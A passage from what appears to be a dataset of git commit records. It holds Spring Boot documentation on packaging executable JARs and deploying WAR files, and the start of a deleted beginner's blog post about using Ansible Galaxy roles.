Create an executable JAR with Maven\nThe `spring-boot-maven-plugin` can be used to create an executable '`fat`' JAR. If you\nare using the `spring-boot-starter-parent` POM you can simply declare the plugin and\nyour jars will be repackaged:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIf you are not using the parent POM you can still use the plugin, however, you must\nadditionally add an `<executions>` section:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nSee the {spring-boot-maven-plugin-site}\/usage.html[plugin documentation] for full usage\ndetails.\n\n\n[[howto-create-an-additional-executable-jar]]\n=== Use a Spring Boot application as a dependency\nLike a war file, a Spring Boot application is not intended to be used as a dependency. If\nyour application contains classes that you want to share with other projects, the\nrecommended approach is to move that code into a separate module. 
The separate module can\nthen be depended upon by your application and other projects.\n\nIf you cannot rearrange your code as recommended above, Spring Boot's Maven and Gradle\nplugins must be configured to produce a separate artifact that is suitable for use as a\ndependency. The executable archive cannot be used as a dependency as the\n<<appendix-executable-jar-format.adoc#executable-jar-jar-file-structure,executable jar\nformat>> packages application classes in `BOOT-INF\/classes`. This means\nthat they cannot be found when the executable jar is used as a dependency.\n\nTo produce the two artifacts, one that can be used as a dependency and one that is\nexecutable, a classifier must be specified. This classifier is applied to the name of the\nexecutable archive, leaving the default archive for use as dependency.\n\nTo configure a classifier of `exec` in Maven, the following configuration can be used:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nAnd when using Gradle, the following configuration can be used:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbootRepackage {\n\t\tclassifier = 'exec'\n\t}\n----\n\n\n\n[[howto-extract-specific-libraries-when-an-executable-jar-runs]]\n=== Extract specific libraries when an executable jar runs\nMost nested libraries in an executable jar do not need to be unpacked in order to run,\nhowever, certain libraries can have problems. For example, JRuby includes its own nested\njar support which assumes that the `jruby-complete.jar` is always directly available as a\nfile in its own right.\n\nTo deal with any problematic libraries, you can flag that specific nested jars should be\nautomatically unpacked to the '`temp folder`' when the executable jar first runs.\n\nFor example, to indicate that JRuby should be flagged for unpack using the Maven Plugin\nyou would add the following configuration:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<requiresUnpack>\n\t\t\t\t\t\t<dependency>\n\t\t\t\t\t\t\t<groupId>org.jruby<\/groupId>\n\t\t\t\t\t\t\t<artifactId>jruby-complete<\/artifactId>\n\t\t\t\t\t\t<\/dependency>\n\t\t\t\t\t<\/requiresUnpack>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nAnd to do that same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\trequiresUnpack = ['org.jruby:jruby-complete']\n\t}\n----\n\n\n\n[[howto-create-a-nonexecutable-jar]]\n=== Create a non-executable JAR with exclusions\nOften if you have an executable and a non-executable jar as build products, the executable\nversion will have additional configuration files that are not needed in a library jar.\nE.g. 
the `application.yml` configuration file might excluded from the non-executable JAR.\n\nHere's how to do that in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t\t<plugin>\n\t\t\t\t<artifactId>maven-jar-plugin<\/artifactId>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<id>exec<\/id>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<classifier>exec<\/classifier>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<phase>package<\/phase>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>jar<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t\t<configuration>\n\t\t\t\t\t\t\t<!-- Need this to ensure application.yml is excluded -->\n\t\t\t\t\t\t\t<forceCreation>true<\/forceCreation>\n\t\t\t\t\t\t\t<excludes>\n\t\t\t\t\t\t\t\t<exclude>application.yml<\/exclude>\n\t\t\t\t\t\t\t<\/excludes>\n\t\t\t\t\t\t<\/configuration>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nIn Gradle you can create a new JAR archive with standard task DSL features, and then have\nthe `bootRepackage` task depend on that one using its `withJarTask` property:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tjar {\n\t\tbaseName = 'spring-boot-sample-profile'\n\t\tversion = '0.0.0'\n\t\texcludes = ['**\/application.yml']\n\t}\n\n\ttask('execJar', type:Jar, dependsOn: 'jar') {\n\t\tbaseName = 'spring-boot-sample-profile'\n\t\tversion = '0.0.0'\n\t\tclassifier = 'exec'\n\t\tfrom sourceSets.main.output\n\t}\n\n\tbootRepackage {\n\t\twithJarTask = tasks['execJar']\n\t}\n----\n\n\n\n[[howto-remote-debug-maven-run]]\n=== Remote debug a Spring Boot application started with Maven\nTo attach a remote debugger to a Spring Boot application started with Maven you can use\nthe `jvmArguments` property of the {spring-boot-maven-plugin-site}\/[maven plugin].\n\nCheck {spring-boot-maven-plugin-site}\/examples\/run-debug.html[this example] for more details.\n\n\n\n[[howto-remote-debug-gradle-run]]\n=== Remote debug a Spring Boot application started with Gradle\nTo attach a remote debugger to a Spring Boot application started with Gradle you can use\nthe `jvmArgs` property of `bootRun` task or `--debug-jvm` command line option.\n\n`build.gradle`:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbootRun {\n\t\tjvmArgs \"-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=5005\"\n\t}\n----\n\n\nCommand line:\n\n[indent=0]\n----\n\t$ gradle bootRun --debug-jvm\n----\n\n\nCheck {gradle-userguide}\/application_plugin.html[Gradle Application Plugin] for more\ndetails.\n\n\n\n[[howto-build-an-executable-archive-with-ant]]\n=== Build an executable archive from Ant without using spring-boot-antlib\nTo build with Ant you need to grab dependencies, compile and then create a jar or war\narchive. To make it executable you can either use the `spring-boot-antlib`\nmodule, or you can follow these instructions:\n\n. If you are building a jar, package the application's classes and resources in a nested\n `BOOT-INF\/classes` directory. 
If you are building a war, package the application's\n classes in a nested `WEB-INF\/classes` directory as usual.\n. Add the runtime dependencies in a nested `BOOT-INF\/lib` directory for a jar or\n `WEB-INF\/lib` for a war. Remember *not* to compress the entries in the archive.\n. Add the `provided` (embedded container) dependencies in a nested `BOOT-INF\/lib`\n directory for jar or `WEB-INF\/lib-provided` for a war. Remember *not* to compress the\n entries in the archive.\n. Add the `spring-boot-loader` classes at the root of the archive (so the `Main-Class`\n is available).\n. Use the appropriate launcher, e.g. `JarLauncher` for a jar file, as a `Main-Class`\n attribute in the manifest and specify the other properties it needs as manifest entries,\n principally a `Start-Class`.\n\nExample:\n\n[source,xml,indent=0]\n----\n\t<target name=\"build\" depends=\"compile\">\n\t\t<jar destfile=\"target\/${ant.project.name}-${spring-boot.version}.jar\" compress=\"false\">\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"target\/classes\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"src\/main\/resources\" erroronmissingdir=\"false\"\/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/classes\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<mappedresources>\n\t\t\t\t<fileset dir=\"${lib.dir}\/runtime\" \/>\n\t\t\t\t<globmapper from=\"*\" to=\"BOOT-INF\/lib\/*\"\/>\n\t\t\t<\/mappedresources>\n\t\t\t<zipfileset src=\"${lib.dir}\/loader\/spring-boot-loader-jar-${spring-boot.version}.jar\" \/>\n\t\t\t<manifest>\n\t\t\t\t<attribute name=\"Main-Class\" value=\"org.springframework.boot.loader.JarLauncher\" \/>\n\t\t\t\t<attribute name=\"Start-Class\" value=\"${start-class}\" \/>\n\t\t\t<\/manifest>\n\t\t<\/jar>\n\t<\/target>\n----\n\nThe {github-code}\/spring-boot-samples\/spring-boot-sample-ant[Ant Sample] has a\n`build.xml` with a `manual` task that should work if you run it with\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ ant -lib <folder containing ivy-2.2.jar> clean manual\n----\n\nafter which you can run the application with\n\n[indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t$ java -jar target\/*.jar\n----\n\n\n\n[[howto-use-java-6]]\n=== How to use Java 6\nIf you want to use Spring Boot with Java 6 there are a small number of configuration\nchanges that you will have to make. The exact changes depend on your application's\nfunctionality.\n\n\n\n[[howto-use-java-6-embedded-container]]\n==== Embedded servlet container compatibility\nIf you are using one of Boot's embedded Servlet containers you will have to use a\nJava 6-compatible container. Both Tomcat 7 and Jetty 8 are Java 6 compatible. See\n<<howto-use-tomcat-7>> and <<howto-use-jetty-8>> for details.\n\n\n\n[[howto-use-java-6-jackson]]\n==== Jackson\nJackson 2.7 and later requires Java 7. If you want to use Jackson with Java 6 you\nwill have to downgrade to Jackson 2.6.\n\nSpring Boot uses the Jackson BOM that was introduced as of Jackson 2.7 so you can't just\noverride the `jackson.version` property. 
In order to use Jackson 2.6, you will have to\ndefine the individual modules in the `dependencyManagement` section of your build, check\nhttps:\/\/github.com\/{github-repo}\/blob\/0ffc7dc13f6de82c199a6d503354a88c7aaec2d9\/spring-boot-dependencies\/pom.xml#L523-L597[this\nexample] for more details.\n\n\n\n[[how-to-use-java-6-jta-api]]\n==== JTA API compatibility\nWhile the Java Transaction API itself doesn't require Java 7 the official API jar\ncontains classes that have been built to require Java 7. If you are using JTA then\nyou will need to replace the official JTA 1.2 API jar with one that has been built\nto work on Java 6. To do so, exclude any transitive dependencies on\n`javax.transaction:javax.transaction-api` and replace them with a dependency on\n`org.jboss.spec.javax.transaction:jboss-transaction-api_1.2_spec:1.0.0.Final`\n\n\n\n[[howto-traditional-deployment]]\n== Traditional deployment\n\n\n\n[[howto-create-a-deployable-war-file]]\n=== Create a deployable war file\n\nThe first step in producing a deployable war file is to provide a\n`SpringBootServletInitializer` subclass and override its `configure` method. This makes\nuse of Spring Framework's Servlet 3.0 support and allows you to configure your\napplication when it's launched by the servlet container. Typically, you update your\napplication's main class to extend `SpringBootServletInitializer`:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\treturn application.sources(Application.class);\n\t\t}\n\n\t\tpublic static void main(String[] args) throws Exception {\n\t\t\tSpringApplication.run(Application.class, args);\n\t\t}\n\n\t}\n----\n\nThe next step is to update your build configuration so that your project produces a war file\nrather than a jar file. If you're using Maven and using `spring-boot-starter-parent` (which\nconfigures Maven's war plugin for you) all you need to do is to modify `pom.xml` to change the\npackaging to war:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<packaging>war<\/packaging>\n----\n\nIf you're using Gradle, you need to modify `build.gradle` to apply the war plugin to the\nproject:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tapply plugin: 'war'\n----\n\nThe final step in the process is to ensure that the embedded servlet container doesn't\ninterfere with the servlet container to which the war file will be deployed. To do so, you\nneed to mark the embedded servlet container dependency as provided.\n\nIf you're using Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependencies>\n\t\t<!-- \u2026 -->\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t<artifactId>spring-boot-starter-tomcat<\/artifactId>\n\t\t\t<scope>provided<\/scope>\n\t\t<\/dependency>\n\t\t<!-- \u2026 -->\n\t<\/dependencies>\n----\n\nAnd if you're using Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tdependencies {\n\t\t\/\/ \u2026\n\t\tprovidedRuntime 'org.springframework.boot:spring-boot-starter-tomcat'\n\t\t\/\/ \u2026\n\t}\n----\n\nNOTE: If you are using a version of Gradle that supports compile only dependencies (2.12\nor later), you should continue to use `providedRuntime`. 
Among other limitations,\n`compileOnly` dependencies are not on the test classpath so any web-based integration\ntests will fail.\n\nIf you're using the <<build-tool-plugins.adoc#build-tool-plugins, Spring Boot build tools>>,\nmarking the embedded servlet container dependency as provided will produce an executable war\nfile with the provided dependencies packaged in a `lib-provided` directory. This means\nthat, in addition to being deployable to a servlet container, you can also run your\napplication using `java -jar` on the command line.\n\nTIP: Take a look at Spring Boot's sample applications for a\n{github-code}\/spring-boot-samples\/spring-boot-sample-traditional\/pom.xml[Maven-based example]\nof the above-described configuration.\n\n\n\n[[howto-create-a-deployable-war-file-for-older-containers]]\n=== Create a deployable war file for older servlet containers\nOlder Servlet containers don't have support for the `ServletContextInitializer` bootstrap\nprocess used in Servlet 3.0. You can still use Spring and Spring Boot in these containers\nbut you are going to need to add a `web.xml` to your application and configure it to load\nan `ApplicationContext` via a `DispatcherServlet`.\n\n\n\n[[howto-convert-an-existing-application-to-spring-boot]]\n=== Convert an existing application to Spring Boot\nFor a non-web application it should be easy (throw away the code that creates your\n`ApplicationContext` and replace it with calls to `SpringApplication` or\n`SpringApplicationBuilder`). Spring MVC web applications are generally amenable to first\ncreating a deployable war application, and then migrating it later to an executable war\nand\/or jar. Useful reading is in the http:\/\/spring.io\/guides\/gs\/convert-jar-to-war\/[Getting\nStarted Guide on Converting a jar to a war].\n\nCreate a deployable war by extending `SpringBootServletInitializer` (e.g. in a class\ncalled `Application`), and add the Spring Boot `@SpringBootApplication` annotation.\nExample:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder application) {\n\t\t\t\/\/ Customize the application or call application.sources(...) to add sources\n\t\t\t\/\/ Since our example is itself a @Configuration class (via @SpringBootApplication)\n\t\t\t\/\/ we actually don't need to override this method.\n\t\t\treturn application;\n\t\t}\n\n\t}\n----\n\nRemember that whatever you put in the `sources` is just a Spring `ApplicationContext` and\nnormally anything that already works should work here. There might be some beans you can\nremove later and let Spring Boot provide its own defaults for them, but it should be\npossible to get something working first.\n\nStatic resources can be moved to `\/public` (or `\/static` or `\/resources` or\n`\/META-INF\/resources`) in the classpath root. Same for `messages.properties` (Spring Boot\ndetects this automatically in the root of the classpath).\n\nVanilla usage of Spring `DispatcherServlet` and Spring Security should require no further\nchanges. 
If you have other features in your application, using other servlets or filters\nfor instance, then you may need to add some configuration to your `Application` context,\nreplacing those elements from the `web.xml` as follows:\n\n* A `@Bean` of type `Servlet` or `ServletRegistrationBean` installs that bean in the\n container as if it was a `<servlet\/>` and `<servlet-mapping\/>` in `web.xml`.\n* A `@Bean` of type `Filter` or `FilterRegistrationBean` behaves similarly (like a\n `<filter\/>` and `<filter-mapping\/>`.\n* An `ApplicationContext` in an XML file can be added through an `@ImportResource` in\n your `Application`. Or simple cases where annotation configuration is heavily used\n already can be recreated in a few lines as `@Bean` definitions.\n\nOnce the war is working we make it executable by adding a `main` method to our\n`Application`, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tpublic static void main(String[] args) {\n\t\tSpringApplication.run(Application.class, args);\n\t}\n----\n\n[NOTE]\n====\nIf you intend to start your application as a war or as an executable application, you\nneed to share the customizations of the builder in a method that is both available to the\n`SpringBootServletInitializer` callback and the `main` method, something like:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@SpringBootApplication\n\tpublic class Application extends SpringBootServletInitializer {\n\n\t\t@Override\n\t\tprotected SpringApplicationBuilder configure(SpringApplicationBuilder builder) {\n\t\t\treturn configureApplication(builder);\n\t\t}\n\n\t\tpublic static void main(String[] args) {\n\t\t\tconfigureApplication(new SpringApplicationBuilder()).run(args);\n\t\t}\n\n\t\tprivate static SpringApplicationBuilder configureApplication(SpringApplicationBuilder builder) {\n\t\t\treturn builder.sources(Application.class).bannerMode(Banner.Mode.OFF);\n\t\t}\n\n\t}\n----\n====\n\nApplications can fall into more than one category:\n\n* Servlet 3.0+ applications with no `web.xml`.\n* Applications with a `web.xml`.\n* Applications with a context hierarchy.\n* Applications without a context hierarchy.\n\nAll of these should be amenable to translation, but each might require slightly different\ntricks.\n\nServlet 3.0+ applications might translate pretty easily if they already use the Spring\nServlet 3.0+ initializer support classes. Normally all the code from an existing\n`WebApplicationInitializer` can be moved into a `SpringBootServletInitializer`. If your\nexisting application has more than one `ApplicationContext` (e.g. if it uses\n`AbstractDispatcherServletInitializer`) then you might be able to squash all your context\nsources into a single `SpringApplication`. The main complication you might encounter is if\nthat doesn't work and you need to maintain the context hierarchy. See the\n<<howto-build-an-application-context-hierarchy, entry on building a hierarchy>> for\nexamples. 
An existing parent context that contains web-specific features will usually\nneed to be broken up so that all the `ServletContextAware` components are in the child\ncontext.\n\nApplications that are not already Spring applications might be convertible to a Spring\nBoot application, and the guidance above might help, but your mileage may vary.\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic would be something like this:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.context.web.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use logback, you will also need to tell WebLogic to prefer the packaged version\nrather than the version that pre-installed with the server. You can do this by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttp:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-servlet-2-5]]\n=== Deploying a WAR in an Old (Servlet 2.5) Container\nSpring Boot uses Servlet 3.0 APIs to initialize the `ServletContext` (register `Servlets`\netc.) so you can't use the same application out of the box in a Servlet 2.5 container.\nIt *is* however possible to run a Spring Boot application on an older container with some\nspecial tools. If you include `org.springframework.boot:spring-boot-legacy` as a\ndependency (https:\/\/github.com\/scratches\/spring-boot-legacy[maintained separately] to the\ncore of Spring Boot and currently available at 1.0.2.RELEASE), all you should need to do\nis create a `web.xml` and declare a context listener to create the application context and\nyour filters and servlets. The context listener is a special purpose one for Spring Boot,\nbut the rest of it is normal for a Spring application in Servlet 2.5. 
Example:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<web-app version=\"2.5\" xmlns=\"http:\/\/java.sun.com\/xml\/ns\/javaee\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee http:\/\/java.sun.com\/xml\/ns\/javaee\/web-app_2_5.xsd\">\n\n\t\t<context-param>\n\t\t\t<param-name>contextConfigLocation<\/param-name>\n\t\t\t<param-value>demo.Application<\/param-value>\n\t\t<\/context-param>\n\n\t\t<listener>\n\t\t\t<listener-class>org.springframework.boot.legacy.context.web.SpringBootContextLoaderListener<\/listener-class>\n\t\t<\/listener>\n\n\t\t<filter>\n\t\t\t<filter-name>metricsFilter<\/filter-name>\n\t\t\t<filter-class>org.springframework.web.filter.DelegatingFilterProxy<\/filter-class>\n\t\t<\/filter>\n\n\t\t<filter-mapping>\n\t\t\t<filter-name>metricsFilter<\/filter-name>\n\t\t\t<url-pattern>\/*<\/url-pattern>\n\t\t<\/filter-mapping>\n\n\t\t<servlet>\n\t\t\t<servlet-name>appServlet<\/servlet-name>\n\t\t\t<servlet-class>org.springframework.web.servlet.DispatcherServlet<\/servlet-class>\n\t\t\t<init-param>\n\t\t\t\t<param-name>contextAttribute<\/param-name>\n\t\t\t\t<param-value>org.springframework.web.context.WebApplicationContext.ROOT<\/param-value>\n\t\t\t<\/init-param>\n\t\t\t<load-on-startup>1<\/load-on-startup>\n\t\t<\/servlet>\n\n\t\t<servlet-mapping>\n\t\t\t<servlet-name>appServlet<\/servlet-name>\n\t\t\t<url-pattern>\/<\/url-pattern>\n\t\t<\/servlet-mapping>\n\n\t<\/web-app>\n----\n\nIn this example we are using a single application context (the one created by the context\nlistener) and attaching it to the `DispatcherServlet` using an init parameter. This is\nnormal in a Spring Boot application (you normally only have one application context).\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e99dc2441a8ce7c58864ef9a27a8d89de738c61c","subject":"Delete the file at '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","message":"Delete the file at '_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc'","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_file":"_posts\/2017-08-18-or-how-Ansible-Galaxy-can-short-your-way-to-awesomeness.adoc","new_contents":"","old_contents":"= How a developer can shorten their path to learning Ansible\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/galaxy_cover.jpg\n:published_at: 2017-08-18\n:hp-tags: Ansible, Ansible_Galaxy\n:hp-alt-title: ...or how Ansible Galaxy can short your way to awesomeness\n\nYou're a developer who's starting to feel anxious to learn Ansible (everybody is talking about it), but you barely know how to list a directory on a Linux machine! Don't worry: you can use your developer skills to learn Ansible and start doing some magic, building your way towards DevOps in a short time with a little help from Ansible Galaxy.\n\nSo you've learned http:\/\/docs.ansible.com\/ansible\/latest\/intro.html[all the basics of Ansible] and now you're asking yourself: where are the patterns? How do I start using Ansible on a regular basis? How can I do this or that? 
I'm a newbie on the OS side and I barely know where to start...\n\nI don't know if I'll provide the answers to all these questions, but I may help guide your way through it.\n\nQuoting from the https:\/\/galaxy.ansible.com\/intro[official Ansible Galaxy documentation]:\n____\nAnsible Galaxy is Ansible\u2019s official community hub for sharing Ansible roles. A role is the Ansible way of bundling automation content and making it reusable.\n____\n\n**Reusable**. That's the word IT people always (or should) care about. Roles are Ansible's way to reuse the pieces of work that you always have to do when provisioning some environment. I won't go into detail here on how to create a role; for that, please take a look at the http:\/\/docs.ansible.com\/ansible\/latest\/playbooks_roles.html[official docs], where you should find your answers.\n\nInstead, I'd like to bring your attention to Ansible Galaxy and how you can reuse someone else's work or contribute to it while learning something great. Galaxy is to Ansible roles what https:\/\/hub.docker.com\/[Docker Hub] is to Docker images or Github is to open source projects. There you'll find a lot of roles people have already written, so you can take them and orchestrate your playbook in a way that does nearly anything you need.\n\nSo Ansible Galaxy can help you: (a) learn by example, looking at the code other people have already provided; and (b) create great playbooks by orchestrating roles written by the community.\n\nLet's take a look at a https:\/\/bitbucket.org\/tecnobizz\/vagrant-alm[project I'm working on] that provisions an environment to set up a sort of https:\/\/en.wikipedia.org\/wiki\/Application_lifecycle_management[ALM process]. For that, I need to provision three servers: https:\/\/jenkins.io\/[Jenkins] for the CI\/CD process, https:\/\/www.sonarsource.com\/[SonarSource] for quality analysis and http:\/\/www.sonatype.org\/nexus\/[Nexus] as the artifact repository.\n\nProvisioning all three servers requires a lot of vanilla work that I, as a mere enthusiast of Ansible and OSs in general, would surely take *a lot* of time to do. And we don't have that time, right? Take a deep breath, a couple of coffees and come along with me.\n\n=== 1) Define what you need to do\n\nFirst things first. Draw and write down everything you need to provision: a CentOS machine? Does it need NodeJs? Java? PHP? What else? What are the application's requirements? Try to be as detailed as you need to. Take your time to plan your way down the hill, so you'll save time ahead.\n\nFor this project, I just need the aforementioned 3 servers: Jenkins, SonarSource and Nexus on the latest version possible and, of course, everything that it implies: a database server, a JVM, a web server and so on. Everything that I know Ansible may provision for me.\n\n=== 2) Prepare your environment\n\nStart by http:\/\/docs.ansible.com\/ansible\/latest\/intro_installation.html[installing Ansible]. After that, be sure that Ansible Galaxy is on your path by typing this in your console:\n\n```\n$ ansible-galaxy --version\n```\n\nYou should see an output like this:\n\n```\nansible-galaxy 2.3.1.0\nconfig file = \/etc\/ansible\/ansible.cfg\nconfigured module search path = Default w\/o overrides\npython version = 2.7.13 (default, Jun 26 2017, 10:20:05) [GCC 7.1.1 20170622 (Red Hat 7.1.1-3)]\n```\n\nNow configure your `ANSIBLE_ROLES_PATH`. This path is where Ansible Galaxy will save every role you install and where Ansible will look when resolving the imports from your playbook. 
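\n\nFor example, you could point it to a folder owned by your user (the path below is just an illustration):\n\n```\n$ export ANSIBLE_ROLES_PATH=$HOME\/ansible\/roles\n```\n\n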
The http:\/\/docs.ansible.com\/ansible\/latest\/galaxy.html#roles-path[default path] is `\/etc\/ansible\/roles`. Make sure that the user who's installing the roles has write permissions there. If you are running on your own machine, make it yours:\n\n```\n$ sudo chown -R myuser:myuser \/etc\/ansible\/roles\n```\n\nThen you should work in a virtual machine environment. For that you could use http:\/\/docs.ansible.com\/ansible\/latest\/guide_vagrant.html[Vagrant on top of libvirt].\n\nAnd that's it! You should have your environment set up. For more detailed information about the installation and configuration of Ansible Galaxy, please http:\/\/docs.ansible.com\/ansible\/latest\/galaxy.html[check the docs].\n\n\n=== 3) Looking for the roles that you need\n\nSo now you have the plan for what you need to do and Ansible Galaxy configured in your environment. Let's search for the roles that we need to **compose** our playbook, so we can provision all three servers at once.\n\nRemember that you just need to bring all these roles from the Galaxy repository and run them in an orchestrated fashion to do what you need.\n\nYou have at least three ways to search for roles:\n\n1 - **Ansible Galaxy command line**: \n\n```\n$ ansible-galaxy search *jenkins*\n```\n\nYou'll see a list of roles matching the name you provide as an argument. It's a simple and fast way to look for a role, but not my preferred one. This list only provides the name and a short description of each role. That may suffice if what you are looking for is not so popular, but as in the example above, the result may return a lot of options. What to choose?\n\n2 - **Ansible Galaxy Web UI Search**. \n\nGo to https:\/\/galaxy.ansible.com\/[the Ansible Galaxy web site] and start exploring or browsing for a role. Let's use the same example as before and just search for Jenkins. Click on \"Browse Roles\" and type \"Jenkins\" as the keyword (or just https:\/\/galaxy.ansible.com\/list#\/roles?page=1&page_size=10&autocomplete=jenkins[click here]). You'll see a nice interface and a sort function that makes all the difference: `Stargazers`. That means we can filter by the most relevant roles, as upvoted by the community. Prefer the one with the most stars. For this example, the chosen role will be the https:\/\/galaxy.ansible.com\/geerlingguy\/jenkins\/[geerlingguy one].\n\n3 - **Google it**. 